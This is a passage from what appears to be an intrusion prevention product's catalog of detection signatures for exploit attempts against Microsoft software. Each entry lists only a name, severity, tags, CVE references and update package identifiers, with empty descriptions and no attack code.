Tags: Any Operating System, Any Hardware, Apple QuickTime, Microsoft Office, CVE2009, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
Apple-QuickTime-FlashPix-File-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-OLE-Structured-Storage-File-Download

About this situation: Detected a download of OLE Structured Storage file
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
File-Type-Identification
Description:
Back to top

HTTP_SS-Microsoft-OLE-Structured-Storage-Suspicious-File-Download

About this situation: Detected a download of a suspicious OLE Structured Storage file
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-174-2032
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
Description:
Back to top

HTTP_SS-Microsoft-Outlook-SMB-Msg-Attachment

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2010-07, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-322-4219
Last changed: sgpkg-ips-322-4219
Vulnerability: Microsoft-Outlook-Smb-Attach_By_Reference-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: Microsoft-Paint-JPEG-Image-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Data-Out-Of-Bounds-CVE-2009-1131
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability

About this situation: An attempt to exploit PowerPoint vulnerability CVE-2011-0655
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-04, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-1618-5242
Vulnerability: Microsoft-PowerPoint-Fp-Technocolor-TimeBandit-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Heap-Corruption-CVE-2009-1130
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0221
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0224

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Integer-Overflow-CVE-2009-0224
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0225
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-0556
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1128
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, MS2009-05, CVE2009, Any Operating System not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Vulnerability: Microsoft-PowerPoint-Memory-Corruption-CVE-2009-1129
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability

About this situation: An attempt to exploit PowerPoint vulnerability CVE-2011-0976
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-04, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-388-4219
Last changed: sgpkg-ips-483-5211
Vulnerability: Microsoft-PowerPoint-OfficeArt-Atom-RCE-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint 2002, Microsoft PowerPoint 2003, MS2011-05, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-390-4219
Last changed: sgpkg-ips-390-4219
Vulnerability: Microsoft-PowerPoint-Presentation-Buffer-Overrun-CVE-2011-1269
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2004, Microsoft Office 2008, Microsoft PowerPoint 2002, Microsoft PowerPoint 2003, Microsoft PowerPoint 2007, MS2011-05, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-390-4219
Last changed: sgpkg-ips-390-4219
Vulnerability: Microsoft-PowerPoint-Presentation-Memory-Corruption-CVE-2011-1269
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Office PowerPoint detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint, Microsoft Office, Microsoft Office System, MS2008-08, CVE2008, Any Operating System not specific, Microsoft PowerPoint not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-PowerPoint-Txmasterstyle10atom-Processing-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft PowerPoint Viewer detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft PowerPoint Viewer, MS2008-08, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-PowerPoint-Viewer-Drawing-Shape-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-09, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Products-Uniscribe-Font-Parsing-Engine-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2002, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-364-4219
Last changed: sgpkg-ips-364-4219
Vulnerability: Microsoft-Publisher-Array-Indexing-Memory-Corruption-CVE-2010-3955
Description:
Back to top

HTTP_SS-Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Publisher detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2002, Microsoft Publisher 2003, Microsoft Publisher 2007, MS2010-04, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-319-4219
Last changed: sgpkg-ips-1296-5242
Vulnerability: Microsoft-Publisher-File-Conversion-Textbox-Processing-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569

About this situation: Detected attempt to exploit a vulnerability in Microsoft Publisher
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Publisher 2002, Microsoft Publisher 2007, MS2010-12, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-363-4219
Last changed: sgpkg-ips-363-4219
Vulnerability: Microsoft-Publisher-Size-Value-Heap-Corruption-CVE-2010-2569
Description:
Back to top

HTTP_SS-Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044

About this situation: An attempt to exploit RDP vulnerability via ActiveX detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-238-3038
Vulnerability: Microsoft-Remote-Desktop-Protocol-ActiveX-Vulnerability-MS09-044
Description:
Back to top

HTTP_SS-Microsoft-Scriptlet-ActiveX-Component-Usage

About this situation: Reference to Microsoft Scriptlet ActiveX component detected
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2010-10, CVE2010, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-3331
Description:
Back to top

HTTP_SS-Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2011-09, CVE2011, Windows not specific, Microsoft Sharepoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-412-4219
Vulnerability: Microsoft-Sharepoint-Remote-File-Disclosure-Vulnerability
Description:
Back to top

HTTP_SS-Microsoft-Silverlight-Pointer-Handling-Memory-Corruption

About this situation: Microsoft Silverlight memory corruption
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Silverlight, MS2010-08, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-331-4219
Last changed: sgpkg-ips-331-4219
Vulnerability: Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft SQL Server detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server, MS2008-07, CVE2008, Windows not specific, Microsoft SQL Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in Microsoft SQL Server detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP_Microsoft-SQL-Server-Distributed-Management-Objects-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-VBA6-Stack-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic for Applications detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2007, MS2010-05, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-304-4219
Vulnerability: Microsoft-VBA6-Stack-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-288-4219
Vulnerability: Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
Description:
Back to top

HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Video detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows XP, Windows 2003, Any Hardware, MS2009-07, MS2009-10, CVE2008, CVE2009, Windows XP not specific, Windows 2003 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-228-3038
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
Microsoft-Active-Template-Library-Remote-Code-Execution-MS09-060
Description:
Back to top

HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-08, CVE2008, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-277-4219
Vulnerability: Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
Description:
Back to top

HTTP_SS-Microsoft-Visio-DXF-File-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, Microsoft Office, Microsoft Office System, MS2008-04, CVE2008, Windows not specific, Microsoft Visio not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Visio-DXF-File-Handling-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Visio detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visio, CVE2010, Windows not specific, Microsoft Visio not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-304-4219
Vulnerability: Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing

About this situation: An attempt to exploit a buffer overflow in Microsoft Visual Basic
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Microsoft Visual Basic, MS2008-12, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-193-2032
Last changed: sgpkg-ips-193-2032
Vulnerability: Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
Description:
Back to top

HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic runtime detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Basic, Microsoft Visual FoxPro, MS2008-12, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-252-3038
Vulnerability: Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic runtime detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Project, Microsoft Visual Basic, Microsoft Visual FoxPro, Microsoft FrontPage, MS2008-12, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Microsoft-Visual-Basic-Enterprise-Vb6stkit.dll-Buffer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow

About this situation: Detected an access to the vulnerable ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2008-02, CVE2007, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-BOF
Description:
Back to top

HTTP_SS-Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Microsoft Visual Studio detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Visual Studio, MS2008-12, CVE2008, Windows not specific, Microsoft Visual Studio not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-352-4219
Vulnerability: Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
Description:
Back to top

HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Basic and Visual Studio detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, CVE2007, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption

About this situation: Detected an access to the vulnerable ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Visual Basic, MS2007-08, CVE2007, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Visual-Studio-Project-Name-BOF

About this situation: An attempt to exploit a vulnerability in Visual Studio
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, CVE2006, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: Microsoft-Visual-Studio-Project-Name-BOF
Description:
Back to top

HTTP_SS-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Windows ActiveX Control hxvz.dll detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Help, MS2008-04, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Microsoft-Windows-ActiveX-Control-hxvz.dll-Memory-Corruption
Description:
Back to top

HTTP_SS-Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2011-01, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-369-4219
Last changed: sgpkg-ips-369-4219
Vulnerability: Microsoft-Windows-ADO-Record-Memory-CVE-2011-0027
Description:
Back to top

HTTP_SS-Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-06, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Windows-Ancillary-Function-Driver-Elevation-CVE-2011-1249
Description:
Back to top

HTTP_SS-Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, MS2009-08, CVE2009, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-404-4219
Vulnerability: Microsoft-Windows-AVI-File-Chunck-Length-Integer-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Windows-Cinepak-Codec-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Microsoft-Windows-Cinepak-Codec-Code-Execution
Description:
Back to top

HTTP_SS-Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
